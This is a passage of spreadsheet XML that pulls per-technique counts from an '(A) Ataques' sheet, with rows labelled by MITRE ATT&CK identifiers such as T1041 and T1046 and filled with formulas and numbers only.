        <f>'(A) Ataques'!OL14+'(A) Ataques'!OR14+'(A) Ataques'!OX14+'(A) Ataques'!PD14+'(A) Ataques'!PJ14</f>
        <v>1</v>
      </c>
      <c r="BK14" s="510">
        <f>'(A) Ataques'!ON14+'(A) Ataques'!OT14+'(A) Ataques'!OZ14+'(A) Ataques'!PF14+'(A) Ataques'!PL14</f>
        <v>1</v>
      </c>
      <c r="BL14" s="471">
        <f>'(A) Ataques'!OP14+'(A) Ataques'!OV14+'(A) Ataques'!PB14+'(A) Ataques'!PH14+'(A) Ataques'!PN14</f>
        <v>1</v>
      </c>
      <c r="BM14" s="495">
        <f>'(A) Ataques'!OH14</f>
        <v>1</v>
      </c>
      <c r="BN14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($BJ14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO14" s="469">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!OC14,"")</f>
        <v>1</v>
      </c>
      <c r="BP14" s="510">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!OD14,"")</f>
        <v>1</v>
      </c>
      <c r="BQ14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!OE14,"")</f>
        <v>1</v>
      </c>
      <c r="BR14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!OF14,"")</f>
        <v>1</v>
      </c>
      <c r="BS14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!OJ14,"")</f>
        <v>1</v>
      </c>
      <c r="BT14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($BO14=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="79">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="B15" s="4">
        <f>IF('(A) Ataques'!AK15&lt;&gt;"NO",'(A) Ataques'!E15,"")</f>
        <v>12</v>
      </c>
      <c r="C15" s="6" t="str">
        <f>IF('(A) Ataques'!AK15&lt;&gt;"NO",IF('(A) Ataques'!M15="","",'(A) Ataques'!M15),"")</f>
        <v>T1041-exfiltration_over_c2_channel</v>
      </c>
      <c r="D15" s="4" t="str">
        <f>IF('(A) Ataques'!AK15&lt;&gt;"NO",'(A) Ataques'!F15,"")</f>
        <v>T1041</v>
      </c>
      <c r="E15" s="286">
        <f>IF('(A) Ataques'!AK15&lt;&gt;"NO",'(A) Ataques'!AQ15,"")</f>
        <v>2</v>
      </c>
      <c r="F15" s="288">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!BB15,"")</f>
        <v>0</v>
      </c>
      <c r="G15" s="392">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!BD15,"")</f>
        <v>0</v>
      </c>
      <c r="H15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!BF15,"")</f>
        <v>0</v>
      </c>
      <c r="I15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!BG15,"")</f>
        <v>0</v>
      </c>
      <c r="J15" s="530">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($F15=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BH15,"")</f>
        <v>8</v>
      </c>
      <c r="L15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BJ15,"")</f>
        <v>4</v>
      </c>
      <c r="M15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BL15,"")</f>
        <v>4</v>
      </c>
      <c r="N15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BM15,"")</f>
        <v>2</v>
      </c>
      <c r="O15" s="532">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($K15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P15" s="292">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BN15,"")</f>
        <v>8</v>
      </c>
      <c r="Q15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BP15,"")</f>
        <v>4</v>
      </c>
      <c r="R15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BR15,"")</f>
        <v>4</v>
      </c>
      <c r="S15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BS15,"")</f>
        <v>2</v>
      </c>
      <c r="T15" s="530">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($P15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BT15,"")</f>
        <v>7</v>
      </c>
      <c r="V15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BV15,"")</f>
        <v>3</v>
      </c>
      <c r="W15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BX15,"")</f>
        <v>2</v>
      </c>
      <c r="X15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$BY15,"")</f>
        <v>2</v>
      </c>
      <c r="Y15" s="532">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($U15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z15" s="288">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!BZ15,"")</f>
        <v>25</v>
      </c>
      <c r="AA15" s="392">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!CB15,"")</f>
        <v>11</v>
      </c>
      <c r="AB15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!CD15,"")</f>
        <v>10</v>
      </c>
      <c r="AC15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!CE15,"")</f>
        <v>2</v>
      </c>
      <c r="AD15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF(Z15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CF15,"")</f>
        <v>32</v>
      </c>
      <c r="AF15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CH15,"")</f>
        <v>14</v>
      </c>
      <c r="AG15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CJ15,"")</f>
        <v>12</v>
      </c>
      <c r="AH15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CK15,"")</f>
        <v>2</v>
      </c>
      <c r="AI15" s="287">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($AE15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ15" s="292">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CL15,"")</f>
        <v>0</v>
      </c>
      <c r="AK15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CN15,"")</f>
        <v>0</v>
      </c>
      <c r="AL15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CP15,"")</f>
        <v>0</v>
      </c>
      <c r="AM15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CQ15,"")</f>
        <v>0</v>
      </c>
      <c r="AN15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($AJ15=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CR15,"")</f>
        <v>0</v>
      </c>
      <c r="AP15" s="322">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CT15,"")</f>
        <v>0</v>
      </c>
      <c r="AQ15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CV15,"")</f>
        <v>0</v>
      </c>
      <c r="AR15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!$CW15,"")</f>
        <v>0</v>
      </c>
      <c r="AS15" s="287">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($AO15=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT15" s="288">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!CX15,"")</f>
        <v>8</v>
      </c>
      <c r="AU15" s="392">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!CZ15,"")</f>
        <v>4</v>
      </c>
      <c r="AV15" s="4">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!DB15,"")</f>
        <v>4</v>
      </c>
      <c r="AW15" s="20">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",'(A) Ataques'!DC15,"")</f>
        <v>2</v>
      </c>
      <c r="AX15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($AT15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY15" s="469">
        <f>'(A) Ataques'!LU15+'(A) Ataques'!MA15+'(A) Ataques'!MG15+'(A) Ataques'!MM15+'(A) Ataques'!MS15</f>
        <v>0</v>
      </c>
      <c r="AZ15" s="510">
        <f>'(A) Ataques'!LW15+'(A) Ataques'!MC15+'(A) Ataques'!MI15+'(A) Ataques'!MO15+'(A) Ataques'!MU15</f>
        <v>0</v>
      </c>
      <c r="BA15" s="471">
        <f>'(A) Ataques'!LY15+'(A) Ataques'!ME15+'(A) Ataques'!MK15+'(A) Ataques'!MQ15+'(A) Ataques'!MW15</f>
        <v>0</v>
      </c>
      <c r="BB15" s="471">
        <f>'(A) Ataques'!LQ15</f>
        <v>0</v>
      </c>
      <c r="BC15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($AY15=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD15" s="469">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!LL15,"")</f>
        <v>2</v>
      </c>
      <c r="BE15" s="510">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!LM15,"")</f>
        <v>2</v>
      </c>
      <c r="BF15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!LN15,"")</f>
        <v>0</v>
      </c>
      <c r="BG15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!LO15,"")</f>
        <v>2</v>
      </c>
      <c r="BH15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!LS15,"")</f>
        <v>1</v>
      </c>
      <c r="BI15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($BD15=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ15" s="469">
        <f>'(A) Ataques'!OL15+'(A) Ataques'!OR15+'(A) Ataques'!OX15+'(A) Ataques'!PD15+'(A) Ataques'!PJ15</f>
        <v>0</v>
      </c>
      <c r="BK15" s="510">
        <f>'(A) Ataques'!ON15+'(A) Ataques'!OT15+'(A) Ataques'!OZ15+'(A) Ataques'!PF15+'(A) Ataques'!PL15</f>
        <v>0</v>
      </c>
      <c r="BL15" s="471">
        <f>'(A) Ataques'!OP15+'(A) Ataques'!OV15+'(A) Ataques'!PB15+'(A) Ataques'!PH15+'(A) Ataques'!PN15</f>
        <v>0</v>
      </c>
      <c r="BM15" s="495">
        <f>'(A) Ataques'!OH15</f>
        <v>0</v>
      </c>
      <c r="BN15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($BJ15=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO15" s="469">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!OC15,"")</f>
        <v>0</v>
      </c>
      <c r="BP15" s="510">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!OD15,"")</f>
        <v>0</v>
      </c>
      <c r="BQ15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!OE15,"")</f>
        <v>0</v>
      </c>
      <c r="BR15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!OF15,"")</f>
        <v>0</v>
      </c>
      <c r="BS15" s="471">
        <f>IF('(A) Ataques'!$AP15&lt;&gt;"NO",'(A) Ataques'!OJ15,"")</f>
        <v>0</v>
      </c>
      <c r="BT15" s="331">
        <f>IF('(A) Ataques'!$AK15&lt;&gt;"NO",IF($BO15=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A16" s="79">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="B16" s="4">
        <f>IF('(A) Ataques'!AK16&lt;&gt;"NO",'(A) Ataques'!E16,"")</f>
        <v>13</v>
      </c>
      <c r="C16" s="6" t="str">
        <f>IF('(A) Ataques'!AK16&lt;&gt;"NO",IF('(A) Ataques'!M16="","",'(A) Ataques'!M16),"")</f>
        <v>T1046-Network_scan</v>
      </c>
      <c r="D16" s="4" t="str">
        <f>IF('(A) Ataques'!AK16&lt;&gt;"NO",'(A) Ataques'!F16,"")</f>
        <v>T1046</v>
      </c>
      <c r="E16" s="286">
        <f>IF('(A) Ataques'!AK16&lt;&gt;"NO",'(A) Ataques'!AQ16,"")</f>
        <v>2</v>
      </c>
      <c r="F16" s="288">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!BB16,"")</f>
        <v>6</v>
      </c>
      <c r="G16" s="392">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!BD16,"")</f>
        <v>2</v>
      </c>
      <c r="H16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!BF16,"")</f>
        <v>1</v>
      </c>
      <c r="I16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!BG16,"")</f>
        <v>2</v>
      </c>
      <c r="J16" s="530">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($F16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BH16,"")</f>
        <v>4</v>
      </c>
      <c r="L16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BJ16,"")</f>
        <v>4</v>
      </c>
      <c r="M16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BL16,"")</f>
        <v>2</v>
      </c>
      <c r="N16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BM16,"")</f>
        <v>2</v>
      </c>
      <c r="O16" s="532">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($K16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P16" s="292">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BN16,"")</f>
        <v>10</v>
      </c>
      <c r="Q16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BP16,"")</f>
        <v>6</v>
      </c>
      <c r="R16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BR16,"")</f>
        <v>3</v>
      </c>
      <c r="S16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BS16,"")</f>
        <v>2</v>
      </c>
      <c r="T16" s="530">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($P16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BT16,"")</f>
        <v>8</v>
      </c>
      <c r="V16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BV16,"")</f>
        <v>4</v>
      </c>
      <c r="W16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BX16,"")</f>
        <v>2</v>
      </c>
      <c r="X16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$BY16,"")</f>
        <v>2</v>
      </c>
      <c r="Y16" s="532">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($U16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z16" s="288">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!BZ16,"")</f>
        <v>20</v>
      </c>
      <c r="AA16" s="392">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!CB16,"")</f>
        <v>8</v>
      </c>
      <c r="AB16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!CD16,"")</f>
        <v>4</v>
      </c>
      <c r="AC16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!CE16,"")</f>
        <v>2</v>
      </c>
      <c r="AD16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF(Z16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CF16,"")</f>
        <v>28</v>
      </c>
      <c r="AF16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CH16,"")</f>
        <v>12</v>
      </c>
      <c r="AG16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CJ16,"")</f>
        <v>6</v>
      </c>
      <c r="AH16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CK16,"")</f>
        <v>2</v>
      </c>
      <c r="AI16" s="287">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($AE16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ16" s="292">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CL16,"")</f>
        <v>0</v>
      </c>
      <c r="AK16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CN16,"")</f>
        <v>0</v>
      </c>
      <c r="AL16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CP16,"")</f>
        <v>0</v>
      </c>
      <c r="AM16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CQ16,"")</f>
        <v>0</v>
      </c>
      <c r="AN16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($AJ16=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CR16,"")</f>
        <v>0</v>
      </c>
      <c r="AP16" s="322">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CT16,"")</f>
        <v>0</v>
      </c>
      <c r="AQ16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CV16,"")</f>
        <v>0</v>
      </c>
      <c r="AR16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!$CW16,"")</f>
        <v>0</v>
      </c>
      <c r="AS16" s="287">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($AO16=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT16" s="288">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!CX16,"")</f>
        <v>10</v>
      </c>
      <c r="AU16" s="392">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!CZ16,"")</f>
        <v>6</v>
      </c>
      <c r="AV16" s="4">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!DB16,"")</f>
        <v>3</v>
      </c>
      <c r="AW16" s="20">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",'(A) Ataques'!DC16,"")</f>
        <v>2</v>
      </c>
      <c r="AX16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($AT16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY16" s="469">
        <f>'(A) Ataques'!LU16+'(A) Ataques'!MA16+'(A) Ataques'!MG16+'(A) Ataques'!MM16+'(A) Ataques'!MS16</f>
        <v>6</v>
      </c>
      <c r="AZ16" s="510">
        <f>'(A) Ataques'!LW16+'(A) Ataques'!MC16+'(A) Ataques'!MI16+'(A) Ataques'!MO16+'(A) Ataques'!MU16</f>
        <v>2</v>
      </c>
      <c r="BA16" s="471">
        <f>'(A) Ataques'!LY16+'(A) Ataques'!ME16+'(A) Ataques'!MK16+'(A) Ataques'!MQ16+'(A) Ataques'!MW16</f>
        <v>1</v>
      </c>
      <c r="BB16" s="471">
        <f>'(A) Ataques'!LQ16</f>
        <v>2</v>
      </c>
      <c r="BC16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($AY16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD16" s="469">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!LL16,"")</f>
        <v>6</v>
      </c>
      <c r="BE16" s="510">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!LM16,"")</f>
        <v>2</v>
      </c>
      <c r="BF16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!LN16,"")</f>
        <v>1</v>
      </c>
      <c r="BG16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!LO16,"")</f>
        <v>0</v>
      </c>
      <c r="BH16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!LS16,"")</f>
        <v>2</v>
      </c>
      <c r="BI16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($BD16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ16" s="469">
        <f>'(A) Ataques'!OL16+'(A) Ataques'!OR16+'(A) Ataques'!OX16+'(A) Ataques'!PD16+'(A) Ataques'!PJ16</f>
        <v>1</v>
      </c>
      <c r="BK16" s="510">
        <f>'(A) Ataques'!ON16+'(A) Ataques'!OT16+'(A) Ataques'!OZ16+'(A) Ataques'!PF16+'(A) Ataques'!PL16</f>
        <v>1</v>
      </c>
      <c r="BL16" s="471">
        <f>'(A) Ataques'!OP16+'(A) Ataques'!OV16+'(A) Ataques'!PB16+'(A) Ataques'!PH16+'(A) Ataques'!PN16</f>
        <v>1</v>
      </c>
      <c r="BM16" s="495">
        <f>'(A) Ataques'!OH16</f>
        <v>1</v>
      </c>
      <c r="BN16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($BJ16=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO16" s="469">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!OC16,"")</f>
        <v>1</v>
      </c>
      <c r="BP16" s="510">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!OD16,"")</f>
        <v>1</v>
      </c>
      <c r="BQ16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!OE16,"")</f>
        <v>1</v>
      </c>
      <c r="BR16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!OF16,"")</f>
        <v>1</v>
      </c>
      <c r="BS16" s="471">
        <f>IF('(A) Ataques'!$AP16&lt;&gt;"NO",'(A) Ataques'!OJ16,"")</f>
        <v>1</v>
      </c>
      <c r="BT16" s="331">
        <f>IF('(A) Ataques'!$AK16&lt;&gt;"NO",IF($BO16=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A17" s="79">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
      <c r="B17" s="4">
        <f>IF('(A) Ataques'!AK17&lt;&gt;"NO",'(A) Ataques'!E17,"")</f>
        <v>13</v>
      </c>
      <c r="C17" s="6" t="str">
        <f>IF('(A) Ataques'!AK17&lt;&gt;"NO",IF('(A) Ataques'!M17="","",'(A) Ataques'!M17),"")</f>
        <v>T1046-Version_services_detection1</v>
      </c>
      <c r="D17" s="4" t="str">
        <f>IF('(A) Ataques'!AK17&lt;&gt;"NO",'(A) Ataques'!F17,"")</f>
        <v>T1046</v>
      </c>
      <c r="E17" s="286">
        <f>IF('(A) Ataques'!AK17&lt;&gt;"NO",'(A) Ataques'!AQ17,"")</f>
        <v>160</v>
      </c>
      <c r="F17" s="288">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!BB17,"")</f>
        <v>270</v>
      </c>
      <c r="G17" s="392">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!BD17,"")</f>
        <v>105</v>
      </c>
      <c r="H17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!BF17,"")</f>
        <v>12</v>
      </c>
      <c r="I17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!BG17,"")</f>
        <v>85</v>
      </c>
      <c r="J17" s="530">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($F17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BH17,"")</f>
        <v>837</v>
      </c>
      <c r="L17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BJ17,"")</f>
        <v>284</v>
      </c>
      <c r="M17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BL17,"")</f>
        <v>110</v>
      </c>
      <c r="N17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BM17,"")</f>
        <v>101</v>
      </c>
      <c r="O17" s="532">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($K17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P17" s="292">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BN17,"")</f>
        <v>1107</v>
      </c>
      <c r="Q17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BP17,"")</f>
        <v>389</v>
      </c>
      <c r="R17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BR17,"")</f>
        <v>122</v>
      </c>
      <c r="S17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BS17,"")</f>
        <v>121</v>
      </c>
      <c r="T17" s="530">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($P17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BT17,"")</f>
        <v>15703</v>
      </c>
      <c r="V17" s="322">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BV17,"")</f>
        <v>1240</v>
      </c>
      <c r="W17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BX17,"")</f>
        <v>438</v>
      </c>
      <c r="X17" s="20">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!$BY17,"")</f>
        <v>156</v>
      </c>
      <c r="Y17" s="532">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",IF($U17=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z17" s="288">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!BZ17,"")</f>
        <v>4135</v>
      </c>
      <c r="AA17" s="392">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!CB17,"")</f>
        <v>787</v>
      </c>
      <c r="AB17" s="4">
        <f>IF('(A) Ataques'!$AK17&lt;&gt;"NO",'(A) Ataques'!CD17,"")</f>
        <v>316</v>
      </c>
      <c r="AC17" s="20">
